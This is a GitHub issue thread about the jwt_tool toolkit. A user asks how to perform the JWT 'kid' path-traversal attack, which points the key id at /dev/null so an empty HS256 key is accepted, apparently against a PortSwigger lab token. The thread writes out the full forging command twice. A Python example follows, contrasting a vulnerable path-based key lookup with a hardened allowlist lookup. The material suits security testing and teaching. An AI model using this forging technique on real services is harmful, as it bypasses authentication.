ticarpi / jwt_tool

:snake: A toolkit for testing, tweaking and cracking JSON Web Tokens
GNU General Public License v3.0

Does jwt_tool support the /dev/null attack? #71

Open re4sonzy opened 2 years ago

re4sonzy commented 2 years ago

PS C:\Users\WhoAmI\Desktop> python3 $jwt_tool eyJraWQiOiJlYThmNjRjNi1hM2VmLTRiZDctOWRmYi1iNjM0YmRkZjViMmIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NTM4NDY1NX0.MCxsDgrmR5GDgncc7o0hh1eM5jcnzOnl7eKPoCiZ6Yc -I -hc kid -hv "../../../../../../dev/null" -S hs256 -p ""
usage: jwt_tool.py [-h] [-b] [-t TARGETURL] [-rc COOKIES] [-rh HEADERS] [-pd POSTDATA] [-cv CANARYVALUE] [-np]
                   [-M MODE] [-X EXPLOIT] [-ju JWKSURL] [-S SIGN] [-pr PRIVKEY] [-T] [-I] [-hc HEADERCLAIM]
                   [-pc PAYLOADCLAIM] [-hv HEADERVALUE] [-pv PAYLOADVALUE] [-C] [-d DICT] [-p PASSWORD] [-kf KEYFILE]
                   [-V] [-pk PUBKEY] [-jw JWKSFILE] [-Q QUERY] [-v]
                   [jwt]
jwt_tool.py: error: argument -p/--password: expected one argument

righettod commented 2 years ago

Hi,

I'm adding some context for this request, based on the token content 😃

image

Source: https://portswigger.net/web-security/jwt

re4sonzy commented 2 years ago

Hi, can you make -p accept "" ?

ticarpi commented 2 years ago

The tool does accept a blank password with -p ""
Or you can use the "blank password" exploit mode with -X b

The same command works for me when substituting the jwt_tool.py binary name:

python3 jwt_tool.py eyJraWQiOiJlYThmNjRjNi1hM2VmLTRiZDctOWRmYi1iNjM0YmRkZjViMmIiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJwb3J0c3dpZ2dlciIsInN1YiI6IndpZW5lciIsImV4cCI6MTY1NTM4NDY1NX0.MCxsDgrmR5GDgncc7o0hh1eM5jcnzOnl7eKPoCiZ6Yc -I -hc kid -hv "../../../../../../dev/null" -S hs256 -p ""

What does $jwt_tool map to on your system?
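
The server-side kid handling that the command in this thread tests for, as an added example (not code from jwt_tool or from anyone in the thread): a verifier that joins kid into a file path accepts an HS256 token signed with an empty key once kid resolves to /dev/null, while a verifier that treats kid as an allowlist label and refuses short keys rejects it. The function names, the `k1` key id and the sample claims are constructed for illustration; a POSIX system with /dev/null is assumed.

```python
import base64, hashlib, hmac, json, os, re, tempfile

def b64u(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64u_dec(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    signing_input = ".".join(b64u(json.dumps(p, separators=(",", ":")).encode()) for p in (header, payload))
    return signing_input + "." + b64u(hmac.new(key, signing_input.encode(), hashlib.sha256).digest())

def verify_hs256(token: str, resolve_key) -> bool:
    head, body, sig = token.split(".")
    header = json.loads(b64u_dec(head))
    key = resolve_key(header.get("kid")) if header.get("alg") == "HS256" else None
    if key is None:
        return False
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64u_dec(sig))

def key_from_path(key_dir: str):
    # Weak pattern: the token's kid is joined into a filesystem path unchecked.
    def resolve(kid):
        with open(os.path.join(key_dir, kid), "rb") as fh:
            return fh.read()          # /dev/null reads as b"", i.e. an empty HMAC key
    return resolve

def key_from_allowlist(keys: dict):
    # Hardened pattern: kid is only a lookup label; unknown, empty or short keys are refused.
    def resolve(kid):
        key = keys.get(kid) if isinstance(kid, str) and re.fullmatch(r"[A-Za-z0-9_-]{1,64}", kid) else None
        return key if key and len(key) >= 32 else None
    return resolve

def demo():
    key_dir = os.path.realpath(tempfile.mkdtemp())       # constructed, empty key directory
    keys = {"k1": os.urandom(32)}                         # constructed server key
    kid = "../" * key_dir.count(os.sep) + "dev/null"      # same shape as the -hv value in the thread
    forged = sign_hs256({"kid": kid, "alg": "HS256"}, {"sub": "test-user"}, b"")
    genuine = sign_hs256({"kid": "k1", "alg": "HS256"}, {"sub": "test-user"}, keys["k1"])
    safe = key_from_allowlist(keys)
    return verify_hs256(forged, key_from_path(key_dir)), verify_hs256(forged, safe), verify_hs256(genuine, safe)
```

`demo()` returns `(True, False, True)`: the path-based lookup accepts the empty-key token, the allowlist lookup rejects it and still accepts a token signed with the real key.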